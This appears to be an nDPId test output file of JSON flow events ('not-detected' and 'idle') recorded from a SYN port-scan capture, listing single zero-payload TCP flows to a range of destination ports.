+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":570,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5988,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":570,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5988,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":897,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5989,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":897,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5989,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":650,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5988,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":650,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5988,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":958,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5989,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":958,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5989,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3945,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3945,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":839,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8042,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":839,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3945,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3945,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":908,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8042,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":908,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":992,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1900,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":992,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1744,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":65389,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1744,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":65389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1055,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1900,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1055,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8045,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1810,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":65389,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1810,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":65389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1064,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1064,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8045,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":628,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":628,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":709,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":709,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1481,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1481,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1568,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1568,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1392,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1392,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
